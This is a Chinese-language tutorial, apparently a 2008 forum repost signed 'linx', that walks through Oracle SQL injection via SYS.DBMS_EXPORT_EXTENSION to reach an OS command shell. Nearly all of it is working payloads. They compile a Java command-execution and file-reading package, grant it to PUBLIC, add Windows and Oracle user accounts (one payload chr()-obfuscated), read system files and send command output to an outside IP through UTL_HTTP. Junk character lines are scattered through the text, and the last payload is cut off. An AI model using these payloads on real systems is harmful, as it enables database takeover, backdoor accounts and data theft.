实例演示oracle注入获取cmdshell的全过程

admin

以下的演示都是在web上的sql plus执行的，在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成
/ D, l9 `$ \" e
! k6 p9 k. b+ n/ t3 a5 P　　/xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....)
+ D# y" y! C  Y3 h( o8 m; u的形式即可。(用" 'a'|| "是为了让语句返回true值)
, M! {6 \* V: i0 N$ v) B' ?语句有点长，可能要用post提交。
) y8 d  c5 o: P( |: a2 ?7 R以下是各个步骤：
& S" b0 I3 j9 G0 V% C1.创建包
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数，在oracle上创建Java包LinxUtil，里面两个函数，runCMD用于执行系统命令，readFile用于读取文件：
- w3 m- f* U) @! o7 b' d/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 Z: [- \5 r: m% X$ R/ Zcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
}'''';END;'';END;--','SYS',0,'1',0) from dual
)
. Y& L, i$ ^0 Y- t3 U------------------------
如果url有长度限制，可以把readFile()函数块去掉，即：
: y5 q( u4 p' U* H. g! n. X) j/xxx.jsp?id=1 and '1'<>'a'||(
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
7 R3 `( |8 w+ H" X7 Ncreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
9 W; ^  r# [7 i! t+ i. Nnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
. T4 p! C$ ?1 y) P# ]0 V! W/ m+ i}'''';END;'';END;--','SYS',0,'1',0) from dual
2 q0 W5 [! B4 ]/ h# L6 P( C, u+ ^  T)
( m7 ^7 l' [% J& c同时把后面步骤 提到的 对readFile()的处理语句去掉。
2 E# K$ B6 v- H; u5 k* O4 p/ y------------------------------
4 V+ @1 A. h; C% p2 e* O6 f2.赋Java权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
( n5 V* [0 d/ k) b3.创建函数
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 c6 ?1 i0 k  n/ V0 dcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
4.赋public执行函数的权限
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual
& u6 j2 z( d/ V# ?1 @6 W! A5 W+ N' e: G5.测试上面的几步是否成功
and '1'<>'11'||(
select  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD'
)
and '1'<>(
: ]' b# d+ `  Tselect  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
)
6.执行命令：
- h" v0 L! a6 J$ b$ Z3 Q  B/xxx.jsp?id=1 and '1'<>(
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual

! i" j0 p! b* G" V)
" ?5 F+ U: C' e3 ?! O/xxx.jsp?id=1 and '1'<>(
; {* }+ ~& j" p! H8 g$ @select  sys.LinxReadFile('c:/boot.ini') from dual
1 c$ Y9 k/ B; _
4 ^( ^" p: S) f3 c( |! I)
　　
" M; z+ s5 E8 E注意sys.LinxReadFile()返回的是varchar类型，不能用"and 1<>" 代替 "and '1'<>"。
如果要查看运行结果可以用 union :
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
或者UTL_HTTP.request(:
/xxx.jsp?id=1 and '1'<>(
3 g! ?- a4 W, [0 L% iSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual
  c; U$ y/ Q) j9 B! N)
) [) @  h) ]2 ]$ @4 C  U/xxx.jsp?id=1 and '1'<>(
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
)
注意：用UTL_HTTP.request时，要用 REPLACE() 把空格、换行符给替换掉，否则会无法提交http request。用utl_encode.base64_encode也可以。
--------------------
% J3 c, u" n9 p/ p( P6.内部变化
通过以下命令可以查看all_objects表达改变：
8 L6 Y- G9 v2 s7 ?6 Gselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
! f: n% L2 V; H8 F* ^2 z% K7.删除我们创建的函数
0 Y6 F) F$ G" Gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
9 ?) J4 a$ W; B$ Q, xdrop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual
====================================================
全文结束。谨以此文赠与我的朋友。
linx
124829445
/ v9 u4 g/ x, e( y2008.1.12
linyujian@bjfu.edu.cn
" W4 L" k9 `2 {- K* U% t" f======================================================================
测试漏洞的另一方法：
创建oracle帐号：
# p- ?" X. l( q8 S5 d7 W* @. dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" W  P% z6 c/ {; H2 LCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
6 i  _. F1 H2 a0 M2 e. o/ _即：
" @- ]  _7 |3 f6 Y9 z: M# R8 N5 [select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
& D4 X/ V% A1 z6 j6 t9 f; b  hchr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
确定漏洞存在：
1<>(
+ G& a7 }2 R5 e5 C/ Tselect user_id from all_users where username='LINXSQL'
)
6 k" ?+ v: O! L/ {6 Q- S% R* y给linxsql连接权限：
9 o9 ]0 o8 ?; `' d' gselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- f8 f0 `1 w4 l6 Z* N; aGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
删除帐号：
8 V: j( X. r* m  ], V7 ]- Mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
drop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
$ w. D" g* X4 A6 F: E======================
以下方法创建一个可以执行多语句的函数Linx_query()，执行成功的话返回数值"1"，但权限是继承的，可能仅仅是public权限，作用似乎不大，真的要用到话可以考虑grant dba to 当前的User：
; \) m8 j4 N- g* A1.jsp?id=1 and '1'<>(
& W6 U$ ]. t+ l$ Dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
- v1 P( _1 \% o0 b% lcreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
4 ^9 Y2 B, A* F/ N) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
　)
4 D( q2 L( |, Y: y; ~3 \3 `

, f; f2 L4 [% j) O
! ]3 r% e; ?: G" n4 ?# A! P& Y